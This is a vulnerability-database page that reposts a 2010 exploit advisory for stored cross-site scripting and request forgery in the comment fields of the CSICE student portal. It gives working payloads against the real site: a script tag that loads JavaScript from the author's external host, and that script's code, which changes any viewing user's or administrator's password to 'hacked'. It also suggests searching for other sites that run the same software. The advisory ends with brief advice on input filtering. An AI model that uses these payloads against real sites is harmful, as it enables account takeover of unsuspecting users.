Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CSICE XSS and CSRF Vulnerability

🗓️ 16 Mar 2010 00:00:00Reported by FB1H2SType 
zdt
 zdt🔗 0day.today👁 21 Views

CSICE XSS and CSRF Vulnerability in Student Porta

Code
================================
CSICE XSS and CSRF Vulnerability
================================

http://www.csice.org/
Suffers from XSS and CSRF cross site scripting and cross site request
forgery attacks.
The vulnerability lies in the Post comment  filelds in the following page
move to this page 'only for authenticated user'
http://www.csice.org/student/subjects.html

and choose a subject and
http://www.csice.org/student/LessonPosting/59/0/view_units.html

here users are allowed to post comments there,but the comments r not
filtered possibly allowing any one to inject scripts too

like we could update a post with a comment like
<script>alert('Hacked by FB1H2S')</script>

which ill get updated on the DATABASE and the next time when some one
views the page tht page ill alert with javascript alert statnment.

This attack could be taken to another extend,now tht we could run
javascripts on client side we may build a java script, which when runs
ill change the user password to a new value, all we have to do is
update the code in the comment field and when some other user views
the page the script for change password ill get executed and ,his or
her password ill be changed.

Consider for example :
post comment with this
<SCRIPT SRC="http://fb1h2s.byethost15.com/sas.js"></SCRIPT>

wht sas.js do is change the user password to 'hacked' when run on the victim,

var pass_req = createAjaxObject();
var data = 'hacked';
alert(data);
pass_req.open("post","http://www.csice.org/student/ajax_redirect.php?page=student&option=change_password");
pass_req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
pass_req.send("data="+data);

So using this hack we could hack change any users/administrtors
password to a new value

I am not able to figure out what CMS this site runs on, but it surel is an open source CMS, see the inurl:ajax_redirect.php?page=
you could see a lot of results


Filtering the input Will be the way to prevent these issues, have a look at
our website and this paper on how to prevent such attacks
http://www.whitec0de.com/paper/0121

love FB1H2S
hcking is matter of time knowldge and patience




#  0day.today [2018-01-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Mar 2010 00:00Current
7.1High risk
Vulners AI Score7.1
csice organizationxsscsrfcross site scriptingcross site request forgerypost comment fieldsauthenticated userstudent portallesson postingcomment injectiondatabasejavascript attackchange passwordajax redirectinput filteringsecurity preventionwhitec0de paperhacking techniques
21